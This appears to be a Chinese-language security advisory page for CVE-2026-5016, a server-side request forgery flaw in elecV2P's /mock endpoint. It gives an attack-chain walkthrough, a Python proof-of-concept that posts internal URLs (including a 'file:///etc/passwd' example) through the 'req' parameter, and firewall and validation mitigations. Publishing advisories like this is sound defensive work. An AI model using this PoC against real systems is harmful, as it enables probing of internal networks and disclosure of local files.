CVE-2026-5016: elecV2P服务端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-5016

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

elecV2 elecV2P

漏洞概述

elecV2P在3.8.3及之前版本中存在高危安全漏洞。该漏洞源于URL Handler组件的`eAxios`函数处理`req`参数时存在缺陷。攻击者无需认证且无需用户交互，即可远程操纵该参数触发服务端请求伪造（SSRF）。鉴于已有公开利用代码，攻击者可借此探测内网服务或访问受限资源，建议尽快修复。

技术细节

该漏洞位于elecV2P的URL Handler模块中，具体影响`/mock`文件下的`eAxios`函数。该函数主要用于处理外部网络请求，但在解析用户传入的`req`参数时，缺乏对目标URL的有效性校验和内网地址限制。攻击者可以通过精心构造的HTTP数据包，将内网敏感地址（如127.0.0.1、192.168.x.x）或云平台元数据服务地址注入到`req`参数中。服务器接收到请求后，会代为向这些内网地址发起连接。攻击者利用这一SSRF漏洞，可以绕过网络防火墙限制，探测内网开放端口、读取本地敏感文件，甚至进一步攻击内部系统。由于攻击无需认证且可远程执行，危害性极大。鉴于官方尚未回应，用户需采取紧急临时缓解措施。

攻击链分析

STEP 1

1. 侦察

攻击者识别出运行elecV2P 3.8.3或更低版本的目标服务器。

STEP 2

2. 构造载荷

攻击者构造包含恶意`req`参数的JSON数据，该参数指向内网敏感地址（如127.0.0.1）。

STEP 3

3. 发送请求

攻击者向目标的`/mock`接口发送POST请求，无需经过身份验证。

STEP 4

4. 服务端请求

服务器端`eAxios`函数解析`req`参数，并代为向内网地址发起HTTP请求。

STEP 5

5. 信息泄露

攻击者根据服务器返回的响应内容，判断内网端口状态或获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url, internal_url):
    """
    Proof of Concept for CVE-2026-5016 SSRF vulnerability.
    This script sends a malicious request to the vulnerable /mock endpoint.
    """
    # The vulnerable endpoint is typically /mock based on the description
    full_url = f"{target_url}/mock"
    
    # Construct the payload manipulating the 'req' argument
    # The exact JSON structure depends on the eAxios implementation
    payload = {
        "req": internal_url  # e.g., "http://127.0.0.1:22" or "file:///etc/passwd"
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "CVE-2026-5016-Scanner"
    }
    
    try:
        print(f"[*] Sending SSRF request to {full_url} targeting {internal_url}")
        response = requests.post(full_url, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully!")
            print("[+] Response body:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            print(response.text)
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL and internal service to test
    target = "http://127.0.0.1:8000" 
    internal_target = "http://127.0.0.1:80"
    exploit_ssrf(target, internal_target)

影响范围

elecV2P <= 3.8.3

防御指南

临时缓解措施

建议立即通过防火墙或Nginx反向代理阻断外部对`/mock`路径的访问请求。如果业务必须使用，应确保仅在内网环境调用，并在应用层对目标URL进行正则匹配，禁止内网IP及私有DNS解析。同时监控服务器出站流量，发现异常向内网发起的连接及时阻断。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5016
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5016
3 Details https://www.cvedetails.com/cve/CVE-2026-5016/
4 VulDB https://vuldb.com/cve/CVE-2026-5016
5 Link https://github.com/elecV2/elecV2P/
6 Link https://github.com/elecV2/elecV2P/issues/202
7 Link https://vuldb.com/submit/779181
8 Link https://vuldb.com/vuln/353901
9 Link https://vuldb.com/vuln/353901/cti